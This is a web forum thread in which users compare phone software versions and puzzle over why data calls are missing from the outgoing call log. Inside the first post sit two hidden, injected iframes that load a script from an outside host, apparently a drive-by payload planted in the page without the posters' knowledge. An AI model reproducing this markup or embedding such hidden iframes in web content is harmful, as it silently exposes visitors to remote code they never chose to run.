+ Reply to Thread

Thread: Outgoing Calls

Outgoing Calls

I posted about this a while ago. Is ANYONE with the same version as me not able to see their data calls in teh outgoing calls list? This includes any call to Sprint web or your own ISP? I STILL have not found an answer from the two local sprint stores and the "headquarters" or sprint cc advocates.

S:I300.01.S.UJ12
    P: SPRL10013

thanks...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

i dont see my data calls in the outgoing calls...i havethe same ver. as u (UJ12) and itd be nice if they DID show up, so i could track my anytime minutes that i use for getting online to IM and check short news...

I see actual "Data" calls (ie when I use the phone as a wireless modem). However I do not see data calls when I surf the net with the phone. Strange....

I dial my ISP when I use it as a wireless modem -- perhaps that is the difference?

Craig
    I thought grafitti was illegal?

I don't know whythe fluctuation. Marc and I compared versions and they were the same, yet he says his records the calls. I have noticed that if I'm on Blazer and move into phone mode I'll see the call being logged. Yet once I disconnect my connecton, its gone.

Administrator

Arrow

i see my #2932 and it even has a little computer next to it in the outgoing calls log!

...yeeeaaahhhh!! And you've also got a sony earptece that is voice activated.

Administrator

Arrow

see for yourself.
    Attached Thumbnails Attached Thumbnails Outgoing Calls-400%25.jpg  

There must be a menu option that can be set to sdjust this on my unit.

as far as I know, there isnt. I have looked absolutely EVERYWHERE for an option to turn this on, but mine simply doesnt. I have the same version as the one at the store on display, and that one displays the data calls just as Marctronixx's unit does. I am simply baffled...someone suggested a warm reset, but I cant dial out since my network connections are disabled on the warm reset.